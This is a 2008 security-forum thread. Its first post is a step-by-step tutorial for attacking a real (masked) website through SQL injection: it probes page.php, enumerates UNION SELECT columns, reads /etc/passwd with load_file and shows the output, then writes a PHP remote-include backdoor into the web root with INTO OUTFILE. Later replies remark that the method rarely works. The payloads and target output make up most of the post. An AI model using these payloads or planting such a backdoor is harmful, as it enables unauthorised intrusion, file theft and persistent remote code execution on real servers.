|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
[tut]how to upload backdoor by sql inject [exp] |
|
Posted: Wed Mar 12, 2008 2:48 pm |
|
|
onbiew |
Regular user |
|
|
Joined: Nov 29, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
http://whois.domaintools.com/********.org
Quote: | Dedicated Hosting: ********.org is hosted on a dedicated server.
Name Server:NS2.********.COM
Name Server:NS1.********.COM |
Target: upload file
http://********.org/page.php?id=612'
Error:
Quote: | Bad MySQL Statement:
SELECT * FROM site WHERE pID = '612''
--------------------------------------------------------------------------------
MySQL says:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''612''' at line 1
(Line 1465 ,/home3/********/********-www/admin/function.lib.php)
-------------------------------------------------------------------------------- |
Try to attack:
http://********/page.php?id=-612'+union+select+1/*
http://********/page.php?id=-612'+union+select+1,2/*
..
http://********/page.php?id=-612'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
Error:
Quote: | Bad MySQL Statement:
SELECT * FROM site WHERE pID = '-612' union select 1/*'
--------------------------------------------------------------------------------
MySQL says:
The used SELECT statements have a different number of columns
(Line 1465 ,/home3/********/********-www/admin/function.lib.php)
--------------------------------------------------------------------------------
|
http://********.org/page.php?id=-612'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
then blankpage with 12,14
i don't get database, read local:
http://********.org/page.php?id=-612'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,Load_file('/etc/passwd'),15,16,17/*
Quote: | root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: piranha:x:60:60::/home/httpd/html/piranha:/dev/null nobody:x:99:99:Nobody:/: netop:x:0:75::/home/netop:/bin/bash |
try to write file:
http://********.org/page.php?id=-612'%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,'<?php%20include($_GET[link]);?>'+into+outfile+'/home3/********/********-www/nothingdeptrai.php'/*
Quote: | Bad MySQL Statement:
SELECT * FROM site WHERE pID = '-612' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,'' into outfile '/home3/********/********-www/nothingdeptrai.php'/*'
--------------------------------------------------------------------------------
MySQL says:
Can't create/write to file '/home3/********/********-www/nothingdeptrai.php' (Errcode: 13)
(Line 1465 ,/home3/********/********-www/admin/function.lib.php)
--------------------------------------------------------------------------------
|
victim not per for write in folder, try to folder PDF.
http://********.org/page.php?id=-612'%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,'<?php%20include($_GET[link]);?>'+into+outfile+'/home3/********/********-www/PDF/itlangson.php'/*
Quote: | Bad MySQL Statement:
SELECT * FROM site WHERE pID = '-612' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,'' into outfile '/home3/********/********-www/PDF/itlangson.php'/*'
--------------------------------------------------------------------------------
MySQL says:
File '/home3/********/********-www/PDF/itlangson.php' already exists
(Line 1465 ,/home3/********/********-www/admin/function.lib.php) |
Done.
run link:
http://********.org/PDF/itlangson.php
[[ edited by waraxe]]
No real URL-s next time |
|
|
|
|
|
|
|
|
Posted: Wed Mar 12, 2008 8:13 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
This method works in 2% of all server's.
Good work. |
|
|
|
|
Posted: Sat Mar 22, 2008 5:05 pm |
|
|
Frigo |
Regular user |
|
|
Joined: Feb 10, 2008 |
Posts: 13 |
Location: European Union |
|
|
|
|
|
|
Yeah, load_file and into outfile is disabled on most servers. |
|
|
|
|
Posted: Sun Mar 23, 2008 4:09 am |
|
|
kieuanh |
Regular user |
|
|
Joined: Mar 22, 2008 |
Posts: 23 |
|
|
|
|
|
|
|
sql load_file is too old,anyway thx u |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|